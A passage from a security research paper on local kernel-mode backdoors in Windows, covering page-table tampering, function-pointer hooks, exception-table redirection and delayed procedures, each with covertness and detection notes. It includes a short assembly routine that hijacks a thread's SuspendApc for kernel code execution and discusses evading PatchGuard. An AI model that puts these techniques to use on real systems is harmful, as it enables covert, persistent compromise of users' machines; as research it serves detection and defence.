mov ecx,23h + +Without having symbols, third parties have a more difficult time of +distinguishing between a value that is sane and one that is not. + +2.4) Page Table Entries + +When operating in protected mode, x86 processors support virtualizing the +address space through the use of a feature known as paging. The paging +feature makes it possible to virtualize the address space by adding a +translation layer between linear addresses and physical addresses. When paging +is not enabled, linear addresses are equivalent to physical addresses. To +translate addresses, the processor uses portions of the address being +referenced to index directories and tables that convey flags and physical +address information that describe how the translation should be performed. +The majority of the details on how this translation is performed are outside +of the scope of this document. If necessary, the reader should consult +section 3.7 of the Intel System Programming Manual[23]. Many other papers in the +references also discuss this topic[41]. + +The paging system is particularly interesting due to its potential for abuse +in the context of a backdoor. When the processor attempts to translate a +linear address, it walks a number of page tables to determine the associated +physical address. When this occurs, the processor makes a check to ensure +that the task referencing the address has sufficient rights to do so. This +access check is enforced by checking the User/Supervisor bit of the +Page-Directory Entry (PDE) and Page-Table Entry (PTE) associated with the +page. If this bit is clear, only the supervisor (privilege level 0) is +allowed to access the page. If the bit is set, both supervisor and user are +allowed to access the page This isn't always the case depending on whether or +not the WP bit is set in CR0. + +The implications surrounding this flag should be obvious. By toggling the +flag in the PDE and PTE associated with an address, a backdoor can gain access +to read or write kernel-mode memory. This would indirectly make it possible +to gain code execution by making use of one of the other techniques listed in +this document. + +Category: Type II + +Origin: The modification of PDE and PTE entries has been supported since the +hardware paging's inception. The authors were not able to find an exact +source of the first use of this technique in a backdoor. There have been a +number of examples in recent years of tools that abuse the supervisor bit in +one way or another[29, 41]. PaX team provided the first documentation of their +PAGEEXEC code in March, 2003. In January, 1998, Mythrandir mentions the +supervisor bit in phrack 52 but doesn't explicitly call out how it could be +abused[28]. + +Capabilities: Access to kernel-mode data. + +Considerations: Code that attempts to implement this approach would need to +properly support PAE and non-PAE processors on x86 in order to work reliably. +This approach is also extremely dangerous and potentially unreliable depending +on how it interacts with the memory manager. For example, if pages are not +properly locked into physical memory, they may be pruned and thus any PDE or +PTE modifications would be lost. This would result in the user-mode process +losing access to a specific page. + +Covertness: This approach could be considered fairly covert without the +presence of some tool capable of intercepting PDE or PTE modifications. +Locking pages into physical memory may make it easier to detect in a polling +fashion by walking the set of locked pages and checking to see if their +associated PDE or PTE has been made accessible to user-mode. + +2.5) Function Pointers + +The use of function pointers to indirectly transfer control of execution from +one location to another is used extensively by the Windows kernel[18]. Like the +function prologue overwrite described in , the act of hooking a function by +altering a function pointer is an easy way to intercept future calls to a +given function. The difference, however, is that hooking a function by +altering a function pointer will only intercept indirect calls made to the +hooked function through the function pointer. Though this may seem like a +fairly significant limitation, even these restrictions do not drastically +limit the set of function pointers that can be abused to provide a kernel-mode +backdoor. + +The concept itself should be simple enough. All that's necessary is to modify +the contents of a given function pointer to point at untrusted code. When the +function is invoked through the function pointer, the untrusted code is +executed instead. If the untrusted code wishes to be able to call the +function that is being hooked, it can save the address that is stored in the +function pointer prior to overwriting it. When possible, hooking a function +through a function pointer is a simple and elegant solution that should have +very little impact on the stability of the system (with obvious exception to +the quality of the replacement function). + +Regardless of what approach is taken to hook a function, an obvious question +is where the backdoor code associated with a given hook function should be +placed. There are really only two general memory locations that the code can +be stored. It can either stored in user-mode, which would generally make it +specific to a given process, or kernel-mode, which would make it visible +system wide. Deciding which of the two locations to use is a matter of +determining the contextual restrictions of the function pointer being +leveraged. For example, if the function pointer is called through at a raised +IRQL, such as DISPATCH, then it is not possible to store the hook function's +code in pageable memory. Another example of a restriction is the process +context in which the function pointer is used. If a function pointer may be +called through in any process context, then there are only a finite number of +locations that the code could be placed in user-mode. It's important to +understand some of the specific locations that code may be stored in + +Perhaps the most obvious location that can be used to store code that is to +execute in kernel-mode is the kernel pools, such as the PagedPool and +NonPagedPool, which are used to store dynamically allocated memory. In some +circumstances, it may also be possible to store code in regions of memory that +contain code or data associated with device drivers. While these few examples +illustrate that there is certainly no shortage of locations in which to store +code, there are a few locations in particular that are worth calling out. + +One such location is composed of a single physical page that is shared between +user-mode and kernel-mode. This physical page is known as SharedUserData and +it is mapped into user-mode as read-only and kernel-mode as read-write. The +virtual address that this physical page is mapped at is static in both +user-mode (0x7ffe0000) and kernel-mode (0xffdf0000) on all versions of Windows +NT+ The virtual mappings are no longer executable as of Windows XP SP2. +However, it is entirely possible for a backdoor to alter these page +permissions.. There is also plenty of unused memory within the page that is +allocated for SharedUserData. The fact that the mapping address is static +makes it a useful location to store small amounts of code without needing to +allocate additional storage from the paged or non-paged pool[24]. + +Though the SharedUserData mapping is quite useful, there is actually an +alternative location that can be used to store code that is arguably more +covert. This approach involves overwriting a function pointer with the +address of some code from the virtual mapping of the native DLL, ntdll.dll. +The native DLL is special in that it is the only DLL that is guaranteed to be +mapped into the context of every process, including the System process. It is +also mapped at the same base address in every process due to assumptions made +by the Windows kernel. While these are useful qualities, the best reason for +using the ntdll.dll mapping to store code is that doing so makes it possible +to store code in a process-relative fashion. Understanding how this works in +practice requires some additional explanation. + +The native DLL, ntdll.dll, is mapped into the address space of the System +process and subsequent processes during kernel and process initialization, +respectively. This mapping is performed in kernel-mode by nt!PspMapSystemDll. +One can observe the presence of this mapping in the context of the System +process through a debugger as shown below. These same basic steps can be +taken to confirm that ntdll.dll is mapped into other processes as well (The +command !vad is used to dump the virtual address directory for a given +process. This directory contains descriptions of memory regions within a +given process): + +kd> !process 0 0 System +PROCESS 81291660 SessionId: none Cid: 0004 + Peb: 00000000 ParentCid: 0000 + DirBase: 00039000 ObjectTable: e1000a68 + HandleCount: 256. + Image: System +kd> !process 81291660 +PROCESS 81291660 SessionId: none Cid: 0004 + Peb: 00000000 ParentCid: 0000 + DirBase: 00039000 ObjectTable: e1000a68 + HandleCount: 256. + Image: System + VadRoot 8128f288 Vads 4 +... +kd> !vad 8128f288 +VAD level start end commit +... +81207d98 ( 1) 7c900 7c9af 5 Mapped Exe +kd> dS poi(poi(81207d98+0x18)+0x24)+0x30 +e13591a8 "\WINDOWS\system32\ntdll.dll" + +To make use of the ntdll.dll mapping as a location in which to store code, one +must understand the implications of altering the contents of the mapping +itself. Like all other image mappings, the code pages associated with +ntdll.dll are marked as Copy-on-Write (COW) and are initially shared between +all processes. When data is written to a page that has been marked with COW, +the kernel allocates a new physical page and copies the contents of the shared +page into the newly allocated page. This new physical page is then associated +with the virtual page that is being written to. Any changes made to the new +page are observed only within the context of the process that is making them. +This behavior is why altering the contents of a mapping associated with an +image file do not lead to changes appearing in all process contexts. + +Based on the ability to make process-relative changes to the ntdll.dll +mapping, one is able to store code that will only be used when a function +pointer is called through in the context of a specific process. When not +called in a specific process context, whatever code exists in the default +mapping of ntdll.dll will be executed. In order to better understand how this +may work, it makes sense to walk through a concrete example. + +In this example, a rootkit has opted to create a backdoor by overwriting the +function pointer that is used when dispatching IRPs using the +IRP_MJ_FLUSH_BUFFERS major function for a specific device object. The +prototype for the function that handles IRP_MJ_FLUSH_BUFFERS IRPs is shown +below: + +NTSTATUS DispatchFlushBuffers( + IN PDEVICE_OBJECT DeviceObject, + IN PIRP Irp); + +In order to create a context-specific backdoor, the rootkit has chosen to +overwrite the function pointer described above with an address that resides +within ntdll.dll. By default, the rootkit wants all processes except those +that are aware of the backdoor to simply have a no-operation occur when +IRP_MJ_FLUSH_BUFFERS is sent to the device object. For processes that are aware +of the backdoor, the rootkit wants arbitrary code execution to occur in +kernel-mode. To accomplish this, the function pointer should be overwritten +with an address that resides in ntdll.dll that contains a ret 0x8 instruction. +This will simply cause invocations of IRP_MJ_FLUSH_BUFFERS to return (without +completing the IRP). The location of this ret 0x8 should be in a portion of +code that is rarely executed in user-mode. For processes that wish to execute +arbitrary code in kernel-mode, it's as simple as altering the code that exists +at the address of the ret 0x8 instruction. After altering the code, the +process only needs to issue an IRP_MJ_FLUSH_BUFFERS through the FlushFileBuffers +function on the affected device object. The context-dependent execution of +code is made possible by the fact that, in most cases, IRPs are processed in +the context of the requesting process. + +The remainder of this subsection will describe specific function pointers that +may be useful targets for use as backdoors. The authors have tried to cover +some of the more intriguing examples of function pointers that may be hooked. +Still, it goes without saying that there are many more that have not been +explicitly described. The authors would be interested to hear about +additional function pointers that have unique and useful properties in the +context of a local kernel-mode backdoor. + +2.5.1) Import Address Table + +The Import Address Table (IAT) of a PE image is used to store the absolute +virtual addresses of functions that are imported from external PE +images[35]. When a PE image is mapped into virtual memory, the dynamic loader (in +kernel-mode, this is ntoskrnl) takes care of populating the contents of the PE +image's IAT based on the actual virtual address locations of dependent +functions For the sake of simplicity, bound imports are excluded from this +explanation. The compiler, in turn, generates code that uses an indirect call +instruction to invoke imported functions. Each imported function has a +function pointer slot in the IAT. In this fashion, PE images do not need to +have any preconceived knowledge of where dependent PE images are going to be +mapped in virtual memory. Instead, this knowledge can be postponed until a +runtime determination is made. + +The fundamental step involved in hooking an IAT entry really just boils down +to changing a function pointer. What distinguishes an IAT hook from other +types of function pointer hooks is the context in which the overwritten +function pointer is called through. Since each PE image has their own IAT, +any hook that is made to a given IAT will implicitly only affect the +associated PE image. For example, consider a situation where both foo.sys and +bar.sys import ExAllocatePoolWithTag. If the IAT entry for +ExAllocatePoolWithTag is hooked in foo.sys, only those calls made from within +foo.sys to ExAllocatePoolWithTag will be affected. Calls made to the same +function from within bar.sys will be unaffected. This type of limitation can +actually be a good thing, depending on the underlying motivations for a given +backdoor. + +Category: Type I; may legitimately be modified, but should point to expected +values. + +Origin: The origin of the first IAT hook is unclear. In January, 2000, Silvio +described hooking via the ELF PLT which is, in some aspects, functionally +equivalent to the IAT in PE images. + +Capabilities: Kernel-mode code execution + +Considerations: Assuming the calling restrictions of an IAT hook are +acceptable for a given backdoor, there are no additional considerations that +need to be made. + +Covertness: It is possible for modern tools to detect IAT hooks by analyzing +the contents of the IAT of each PE image loaded in kernel-mode. To detect +discrepancies, a tool need only check to see if the virtual address associated +with each function in the IAT is indeed the same virtual address as exported +by the PE image that contains a dependent function. + +2.5.2) KiDebugRoutine + +The Windows kernel provides an extensive debugging interface to allow the +kernel itself (and third party drivers) to be debugged in a live, interactive +environment (as opposed to after-the-fact, post-mortem crash dump debugging). +This debugging interface is used by a kernel debugger program (kd.exe, or +WinDbg.exe) in order to perform tasks such as the inspecting the running state +(including memory, registers, kernel state such as processes and threads, and +the like) of the kernel on-demand. The debugging interface also provides +facilities for the kernel to report various events of interest to a kernel +debugger, such as exceptions, module load events, debug print output, and a +handful of other state transitions. As a result, the kernel debugger +interface has ``hooks'' built-in to various parts of the kernel for the +purpose of notifying the kernel debugger of these events. + +The far-reaching capabilities of the kernel debugger in combination with the +fact that the kernel debugger interface is (in general) present in a +compatible fashion across all OS builds provides an attractive mechanism that +can be used to gain control of a system. By subverting KiDebugRoutine to +instead point to a custom callback function, it becomes possible to +surepticiously gain control at key moments (debug prints, exception +dispatching, kernel module loading are the primary candidates). + +The architecture of the kernel debugger event notification interface can be +summed up in terms of a global function pointer (KiDebugRoutine) in the +kernel. A number distinct pieces of code, such as the exception dispatcher, +module loader, and so on are designed to call through KiDebugRoutine in order +to notify the kernel debugger of events. In order to minimize overhead in +scenarios where the kernel debugger is inactive, KiDebugRoutine is typically +set to point to a dummy function, KdpStub, which performs almost no actions +and, for the most part, simply returns immediately to the caller. However, +when the system is booted with the kernel debugger enabled, KiDebugRoutine may +be set to an alternate function, KdpTrap, which passes the information +supplied by the caller to the remote debugger. + +Although enabling or disabling the kernel debugger has traditionally been a +boot-time-only decision, newer OS builds such as Windows Server 2003 and +beyond have some support for transitioning a system from a ``kernel debugger +inactive'' state to a ``kernel debugger active'' state. As a result, there is +some additional logic now baked into the dummy routine (KdpStub) which can +under some circumstances result in the debugger being activated on-demand. +This results in control being passed to the actual debugger communication +routine (KdpTrap) after an on-demand kernel debugger initialization. Thus, in +some circumstances, KdpStub will pass control through to KdpTrap. + +Additionally, in Windows Server 2003 and later, it is possible to disable the +kernel debugger on the fly. This may result in KiDebugRoutine being changed +to refer to KdpStub instead of the boot-time-assigned KdpTrap. This behavior, +combined with the previous points, is meant to show that provided a system is +booted with the kernel debugger enabled it may not be enough to just enforce a +policy that KiDebugRoutine must not change throughout the lifetime of the +system. + +Aside from exception dispatching notifiations, most debug events find their +way to KiDebugRoutine via interrupt 0x2d, otherwise known as ``DebugService''. +This includes user-mode debug print events as well as kernel mode originated +events (such as kernel module load events). The trap handler for interrupt +0x2d packages the information supplied to the debug service interrupt into the +format of a special exception that is then dispatched via KiExceptionDispatch +(the normal exception dispatcher path for interrupt-generated exceptions). +This in turn leads to KiDebugRoutine being called as a normal part of the +exception dispatcher's operation. + +Category: Type IIa, varies. Although on previous OS versions KiDebugRoutine +was essentially write-once, recent versions allow limited changes of this +value on the fly while the system is booted. + +Origin: At the time of this writing, the authors are not aware of existing +malware using KiDebugRoutine. + +Capabilities: Redirecting KiDebugRoutine to point to a caller-controlled +location allows control to be gained during exception dispatching (a very +common occurrence), as well as certain other circumstances (such as module +loading and debug print output). As an added bonus, because KiDebugRoutine is +integral to the operation of the kernel debugger facility as a whole, it +should be possible to ``filter'' the events received by the kernel debugger by +manipulation of which events are actually passed on to KdpTrap, if a kernel +debugger is enabled. However, it should be noted that other steps would need +to be taken to prevent a kernel debugger from detecting the presence of code, +such as the interception of the kernel debugger read-memory facilities. + +Considerations: Depending on how the system global flags (NtGlobalFlag) are +configured, and whether the system was booted in such a way as to suppress +notification of user mode exceptions to the kernel debugger, exception events +may not always be delivered to KiDebugRoutine. Also, as KiDebugRoutine is not +exported, it would be necessary to locate it in order to intercept it. +Furthermore, many of the debugger events occur in an arbitrary context, such +that pointing KiDebugRoutine to user mode (except within ntdll space) may be +considered dangerous. Even while pointing KiDebugRoutine to ntdll, there is +the risk that the system may be brought down as some debugger events may be +reported while the system cannot tolerate paging (e.g. debug prints). From a +thread-safety perspective, an interlocked exchange on KiDebugRoutine should be +a relatively synchronization-safe operation (however the new callback routine +may never be unmapped from the address space without some means of ensuring +that no callbacks are active). + +Covertness: As KiDebugRoutine is a non-exported, writable kernel global, it +has some inherent defenses against simple detection techniques. However, in +legitimate system operation, there are only two legal values for +KiDebugRoutine: KdpStub, and KdpTrap. Though both of these routines are not +exported, a combination of detection techniques (such as verifying the +integrity of read only kernel code, and a verification that KiDebugRoutine +refers to a location within an expected code region of the kernel memory +image) may make it easier to locate blatant attacks on KiDebugRoutine. For +example, simply setting KiDebugRoutine to point to an out-of-kernel location +could be detected with such an approach, as could pointing it elsewhere in the +kernel and then writing to it (either the target location would need to be +outside the normal code region, easily detectable, or normally read-only code +would have to be overwritten, also relatively easily detectable). Also, all +versions of PatchGuard protect KiDebugRoutine in x64 versions of Windows. +This means that effective exploitation of KiDebugRoutine in the long term on +such systems would require an attacker to deal with PatchGuard. This is +considered a relatively minor difficulty by the authors. + +2.5.3) KTHREAD's SuspendApc + +In order to support thread suspension, the Windows kernel includes a KAPC +field named SuspendApc in the KTHREAD structure that is associated with each +thread running on a system. When thread suspension is requested, the kernel +takes steps to queue the SuspendApc structure to the thread's APC queue. When +the APC queue is processed, the kernel invokes the APC's NormalRoutine, which +is typically initialized to nt!KiSuspendThread, from the SuspendApc structure +in the context of the thread that is being suspended. Once nt!KiSuspendThread +completes, the thread is suspended. The following shows what values the +SuspendApc is typically initialized to: + +kd> dt -r1 _KTHREAD 80558c20 +... + +0x16c SuspendApc : _KAPC + +0x000 Type : 18 + +0x002 Size : 48 + +0x004 Spare0 : 0 + +0x008 Thread : 0x80558c20 _KTHREAD + +0x00c ApcListEntry : _LIST_ENTRY [ 0x0 - 0x0 ] + +0x014 KernelRoutine : 0x804fa8a1 nt!KiSuspendNop + +0x018 RundownRoutine : 0x805139ed nt!PopAttribNop + +0x01c NormalRoutine : 0x804fa881 nt!KiSuspendThread + +0x020 NormalContext : (null) + +0x024 SystemArgument1: (null) + +0x028 SystemArgument2: (null) + +0x02c ApcStateIndex : 0 '' + +0x02d ApcMode : 0 '' + +0x02e Inserted : 0 '' + +Since the SuspendApc structure is specific to a given KTHREAD, any +modification made to a thread's SuspendApc.NormalRoutine will affect only that +specific thread. By modifying the NormalRoutine of the SuspendApc associated +with a given thread, a backdoor can gain arbitrary code execution in +kernel-mode by simply attempting to suspend the thread. It is trivial for a +user-mode application to trigger the backdoor. The following sample code +illustrates how a thread might execute arbitrary code in kernel-mode if its +SuspendApc has been modified: + +SuspendThread(GetCurrentThread()); + +The following code gives an example of assembly that implements the technique +described above taking into account the InitialStack insight described in the +considerations below: + +public _RkSetSuspendApcNormalRoutine@4 +_RkSetSuspendApcNormalRoutine@4 proc + assume fs:nothing + push edi + push esi + ; Grab the current thread pointer + xor ecx, ecx + inc ch + mov esi, fs:[ecx+24h] + ; Grab KTHREAD.InitialStack + lea esi, [esi+18h] + lodsd + xchg esi, edi + ; Find StackBase + repne scasd + ; Set KTHREAD->SuspendApc.NormalRoutine + mov eax, [esp+0ch] + xchg eax, [edi+1ch] + pop esi + pop edi + ret +_RkSetSuspendApcNormalRoutine@4 endp + + +Category: Type IIa + +Origin: The authors believe this to be the first public description of this +technique. Skywing is credited with the idea. Greg Hoglund mentions abusing +APC queues to execute code, but he does not explicitly call out +SuspendApc[18]. + +Capabilities: Kernel-mode code execution. + +Considerations: This technique is extremely effective. It provides a simple +way of executing arbitrary code in kernel-mode by simply hijacking the +mechanism used to suspend a specific thread. There are also some interesting +side effects that are worth mentioning. Overwriting the SuspendApc's +NormalRoutine makes it so that the thread can no longer be suspended. Even +better, if the hook function that replaces the NormalRoutine never returns, it +becomes impossible for the thread, and thus the owning process, to be killed +because of the fact that the NormalRoutine is invoked at APC level. Both of +these side effects are valuable in the context of a rootkit. + +One consideration that must be made from the perspective of a backdoor is that +it will be necessary to devise a technique that can be used to locate the +SuspendApc field in the KTHREAD structure across multiple versions of Windows. +Fortunately, there are heuristics that can be used to accomplish this. In all +versions of Windows analyzed thus far, the SuspendApc field is preceded by the +StackBase field. It has been confirmed on multiple operating systems that the +StackBase field is equal to the InitialStack field. The InitialStack field is +located at a reliable offset (0x18) on all versions of Windows checked by the +authors. Using this knowledge, it is trivial to write some code that scans +the KTHREAD structure on pointer aligned offsets until it encounters a value +that is equal to the InitialStack. Once a match is found, it is possible to +assume that the SuspendApc immediately follows it. + +Covertness: This technique involves overwriting a function pointer in a +dynamically allocated region of memory that is associated with a specific +thread. This makes the technique fairly covert, but not impossible to detect. +One method of detecting this technique would be to enumerate the threads in +each process to see if the NormalRoutine of the SuspendApc is set to the +expected value of nt!KiSuspendThread. It would be challenging for someone +other than Microsoft to implement this safely. The authors are not aware of +any tool that currently does this. + +2.5.4) Create Thread Notify Routine + +The Windows kernel provides drivers with the ability to register a callback +that will be notified when threads are created and terminated. This ability +is provided through the Windows Driver Model (WDM) export +nt!PsSetCreateThreadNotifyRoutine. When a thread is created or terminated, +the kernel enumerates the list of registered callbacks and notifies them of +the event. + +Category: Type II + +Origin: The ability to register a callback that is notified when threads are +created and terminated has been included since the first release of the WDM. + +Capabilities: Kernel-mode code execution. + +Considerations: This technique is useful because a user-mode process can +control the invocation of the callback by simply creating or terminating a +thread. Additionally, the callback will be notified in the context of the +process that is creating or terminating the thread. This makes it possible to +set the callback routine to an address that resides within ntdll.dll. + +Covertness: This technique is covert in that it is possible for a backdoor to +blend in with any other registered callbacks. Without having a known-good +state to compare against, it would be challenging to conclusively state that a +registered callback is associated with a backdoor. There are some indicators +that could be used that something is odd, such as if the callback routine +resides in ntdll.dll or if it resides in either the paged or non-paged pool. + +2.5.5) Object Type Initializers + +The Windows NT kernel uses an object-oriented approach to representing +resources such as files, drivers, devices, processes, threads, and so on. +Each object is categorized by an object type. This object type categorization +provides a way for the kernel to support common actions that should be applied +to objects of the same type, among other things. Under this design, each +object is associated with only one object type. For example, process objects +are associated with the nt!PsProcessType object type. The structure used to +represent an object type is the OBJECT_TYPE structure which contains a nested +structure named OBJECT_TYPEIN_ITIALIZER. It's this second structure that +provides some particularly interesting fields that can be used in a backdoor. + +As one might expect, the fields of most interest are function pointers. These +function pointers, if non-null, are called by the kernel at certain points +during the lifetime of an object that is associated with a particular object +type. The following debugger output shows the function pointer fields: + +kd> dt nt!_OBJECT_TYPE_INITIALIZER +... + +0x02c DumpProcedure : Ptr32 + +0x030 OpenProcedure : Ptr32 + +0x034 CloseProcedure : Ptr32 + +0x038 DeleteProcedure : Ptr32 + +0x03c ParseProcedure : Ptr32 + +0x040 SecurityProcedure : Ptr32 + +0x044 QueryNameProcedure : Ptr32 + +0x048 OkayToCloseProcedure : Ptr32 + +Two fairly easy to understand procedures are OpenProcedure and CloseProcedure. +These function pointers are called when an object of a given type is opened +and closed, respectively. This gives the object type initializer a chance to +perform some common operation on an instance of an object type. In the case +of a backdoor, this exposes a mechanism through which arbitrary code could be +executed in kernel-mode whenever an object of a given type is opened or +closed. + +Category: Type IIa + +Origin: Matt Conover gave an excellent presentation on how object type +initializers can be used to detect rootkits at XCon 2005[8]. Conversely, they +can also be used to backdoor the system. The authors are not aware of public +examples prior to Conover's presentation. Greg Hoglund also mentions this +type of approach[18] in June, 2006. + +Capabilities: Kernel-mode code execution. + +Considerations: There are no unique considerations involved in the use of this +technique. + +Covertness: This technique can be detected by tools designed to validate the +state of object type initializers against a known-good state. Currently, the +authors are not aware of any tools that perform this type of check. + +2.5.6) PsInvertedFunctionTable + +With the introduction of Windows for x64, significant changes were made to how +exceptions are processed with respect to how exceptions operate in x86 +versions of Windows. On x86 versions of Windows, exception handlers were +essentially demand-registered at runtime by routines with exception handlers +(more of a code-based exception registration mechanism). On x64 versions of +Windows, the exception registration path is accomplished using a more +data-driven model. Specifically, exception handling (and especially unwind +handling) is now driven by metadata attached to each PE image (known as the +``exception directory''), which describes the relationship between routines +and their exception handlers, what the exception handler function pointer(s) +for each region of a routine are, and how to unwind each routine's machine +state in a completely data-driven fashion. + +While there are significant advantages to having exception and unwind +dispatching accomplished using a data-driven model, there is a potential +performance penalty over the x86 method (which consisted of a linked list of +exception and unwind handlers registered at a known location, on a per-thread +basis). A specific example of this can be seen when noting that all of the +information needed for the operating system to locate and call the exception +handler for purposes of exception or unwind processing was in one location +(the linked list in the NTTIB) on Windows for x86 is now scattered across all +loaded modules in Windows for x64. In order to locate an exception handler +for a particular routine, it is necessary to search the loaded module list for +the module that contains the instruction pointer corresponding to the +function in question. After the module is located, it is then necessary to +process the PE header of the module to locate the module's exception +directory. Finally, it is then necessary to search the exception directory +of that module for the metadata corresponding to a location encompassing +the requested instruction pointer. This process must be repeated for every +function for which an exception may traverse. + +In an effort to improve the performance of exception dispatching on Windows +for x64, Microsoft developed a multi-tier cache system that speeds the +resolution of exception dispatching information that is used by the routine +responsible for looking up metadata associated with a function. The +routine responsible for this is named RtlLookupFunctionTable. When +searching for unwind information (a pointer to a RUNTIME_FUNCTION entry +structure), depending on the reason for the search request, an internal +first-level cache (RtlpUnwindHistoryTable) of unwind information for +commonly occurring functions may be searched. At the time of this writing, +this table consists of RtlUnwindex, _C_specific_handler, +RtlpExecuteHandlerForException, RtlDispatchException, RtlRaiseStatus, +KiDispatchException, and KiExceptionDispatch. Due to how exception +dispatching operates on x64[39], many of these functions will commonly appear +in any exception call stack. Because of this it is beneficial to +performance to have a first-level, quick reference for them. + +After RtlpUnwindHistoryTable is searched, a second cache, known as +PsInvertedFunctionTable (in kernel-mode) or LdrpInvertedFunctionTable (in +user-mode) is scanned. This second-level cache contains a list of the first +0x200 (Windows Server 2008, Windows Vista) or 0xA0 (Windows Server 2003) +loaded modules. The loaded module list contained within +PsInvertedFunctionTable / LdrpInvertedFunctionTable is presented as a quickly +searchable, unsorted linear array that maps the memory occupied by an entire +loaded image to a given module's exception directory. The lookup through the +inverted function table thus eliminates the costly linked list (loaded module +list) and executable header parsing steps necessary to locate the exception +directory for a module. For modules which are referenced by +PsInvertedFunctionTable / LdrpInvertedFunctionTable, the exception directory +pointer and size information in the PE header of the module in question are +unused after the module is loaded and the inverted function table is +populated. Because the inverted function table has a fixed size, if enough +modules are loaded simultaneously, it is possible that after a point some +modules may need to be scanned via loaded module list lookup if all entries in +the inverted function table are in use when that module is loaded. However, +this is a rare occurrence, and most of the interesting system modules (such as +HAL and the kernel memory image itself) are at a fixed-at-boot position within +PsInvertedFunctionTable[37]. + +By redirecting the exception directory pointer in PsInvertedFunctionTable to +refer to a ``shadow'' exception directory in caller-supplied memory (outside +of the PE header of the actual module), it is possible to change the exception +(or unwind) handling behavior of all code points within a module. For +instance, it is possible to create an exception handler spanning every code +byte within a module through manipulation of the exception directory +information. By changing the inverted function table cache for a module, +multiple benefits are realized with respect to this goal. First, an +arbitrarily large amount of space may be devoted to unwind metadata, as the +patched unwind metadata need not fit within the confines of a particular +image's exception directory (this is particular important if one wishes to +``gift'' all functions within a module with an exception handler). Second, +the memory image of the module in question need not be modified, improving the +resiliency of the technique against naive detection systems. + +Category: Type IIa, varies. Although the entries for always-loaded modules +such as the HAL and the kernel in-memory image itself are essentially +considered write-once, the array as a whole may be modified as the system is +running when kernel modules are either loaded or unloaded. As a result, while +the first few entries of PsInvertedFunctionTable are comparatively easy to +verify, the ``dynamic'' entries corresponding to demand-loaded (and possibly +demand-unloaded) kernel modules may frequently change during the legitimate +operation of the system, and as such interception of the exception directory +pointers of individual drivers may be much less simple to detect than the +interception of the kernel's exception directory. + +Origin: At the time of this writing, the authors are not aware of existing +malware using PsInvertedFunctionTable. Hijacking of PsInvertedFunctionTable +was proposed as a possible bypass avenue for PatchGuard version 2 by +Skywing[37]. Its applicability as a possible attack vector with respect to +hiding kernel mode code was also briefly described in the same article. + +Capabilities: The principal capability afforded by this technique is to +establish an exception handler at arbitrary locations within a target module +(even every code byte within a module if so desired). By virtue of creating +such exception handlers, it is possible to gain control at any location within +a module that may be traversed by an exception, even if the exception would +normally be handled in a safe fashion by the module or a caller of the module. + +Considerations: As PsInvertedFunctionTable is not exported, one must first +locate it in order to patch it (this is considered possible as many exported +routines reference it in an obvious, patterned way, such as +RtlLookupFunctionEntry. Also, although the structure is guarded by a +non-exported synchronization mechanism (PsLoadedModuleSpinLock in Windows +Server 2008), the first few entries corresponding to the HAL and the kernel +in-memory image itself should be static and safely accessible without +synchronization (after all, neither the HAL nor the kernel in-memory image may +be unloaded after the system has booted). It should be possible to perform an +interlocked exchange to swap the exception directory pointer, provided that +the exception directory shall not be modified in a fashion that would require +synchronization (e.g. only appended to) after the exchange is made. The size +of the exception directory is supplied as a separate value in the inverted +function table entry array and would need to be modified separately, which may +pose a synchronization problem if alterations to the exception directory are +not carefully planned to be safe in all possible contingencies with respect to +concurrent access as the alterations are made. Additionally, due to the +32-bit RVA based format of the unwind metadata, all exception handlers for a +module must be within 4GB of that module's loaded base address. This means +that custom exception handlers need to be located within a ``window'' of +memory that is relatively near to a module. Allocating memory at a specific +base address involves additional work as the memory cannot be in an arbitrary +point in the address space, but within 4GB of the target. If a caller can +query the address space and request allocations based at a particular region, +however, this is not seen as a particular unsurmountable problem. + +Covertness: The principal advantage of this approach is that it allows a +caller to gain control at any point within a module's execution where an +exception is generated without modifying any code or data within the module in +question (provided the module is cached within PsInvertedFunctionTable). +Because the exception directory information for a module is unused after the +cache is populated, integrity checks against the PE header are useless for +detecting the alteration of exception handling behavior for a cached module. +Additionally, PsInvertedFunctionTable is a non-exported, writable kernel-mode +global which affords it some intrinsic protection against simple detection +techniques. A scan of the loaded module list and comparison of exception +directory pointers to those contained within PsInvertedFunctionTable could +reveal most attacks of this nature, however, provided that the loaded module +list retains integrity. Additionally, PatchGuard version 3 appears to guard +key portions of PsInvertedFunctionTable (e.g. to block redirection of the +kernel's exception directory), resulting in a need to bypass PatchGuard for +long-term exploitation on Windows x64 based systems. This is considered a +relatively minor difficulty by the authors. + +2.5.7) Delayed Procedures + +There are a number of features offered by the Windows kernel that allow device +drivers to asynchronously execute code. Some examples of these features +include asynchronous procedure calls (APCs), deferred procedure calls (DPCs), +work items, threading, and so on. A backdoor can simply make use of the APIs +exposed by the kernel to make use of any number of these to schedule a task +that will run arbitrary code in kernel-mode. For example, a backdoor might +queue a kernel-mode APC using the ntdll.dll trick described at the beginning +of this section. When the APC executes, it runs code that has been altered in +ntdll.dll in a kernel-mode context. This same basic concept would work for +all other delayed procedures. + +Category: Type II + +Origin: This technique makes implicit use of operating system exposed features +and therefore falls into the category of obvious. Greg Hoglund mentions these +in particular in June, 2006[18]. + +Capabilities: Kernel-mode code execution. + +Considerations: The important consideration here is that some of the methods +that support running delayed procedures have restrictions about where the code +pages reside. For example, a DPC is invoked at dispatch level and must +therefore execute code that resides in non-paged memory. + +Covertness: This technique is covert in the sense that the backdoor is always +in a transient state of execution and therefore could be considered largely +dormant. Since the backdoor state is stored alongside other transient state +in the operating system, this technique should prove more difficult to detect +when compared to some of the other approaches described in this paper. + +2.6) Asynchronous Read Loop + +It's not always necessary to hook some portion of the kernel when attempting +to implement a local kernel-mode backdoor. In some cases, it's easiest to +just make use of features included in the target operating system to blend in +with normal behavior. One particularly good candidate for this involves +abusing some of the features offered by Window's I/O (input/output) manager. + +The I/O model used by Windows has many facets to it. For the purposes of this +paper, it's only necessary to have an understanding of how it operates when +reading data from a file. To support this, the kernel constructs an I/O +Request Packet (IRP) with its MajorFunction set to IRP_MJ_READ. The kernel then +passes the populated IRP down to the device object that is related to the file +that is being read from. The target device object takes the steps needed to +read data from the underlying device and then stores the acquired data in a +buffer associated with the IRP. Once the read operation has completed, the +kernel will call the IRP's completion routine if one has been set. This gives +the original caller an opportunity to make forward progress with the data that +has been read. + +This very basic behavior can be effectively harnessed in the context of a +backdoor in a fairly covert fashion. One interesting approach involves a +user-mode process hosting a named pipe server and a blob of kernel-mode code +reading data from the server and then executing it in the kernel-mode context. +This general behavior would make it possible to run additional code in the +kernel-mode context by simply shuttling it across a named pipe. The specifics +of how this can be made to work are almost as simple as the steps described in +the previous paragraph. + +The 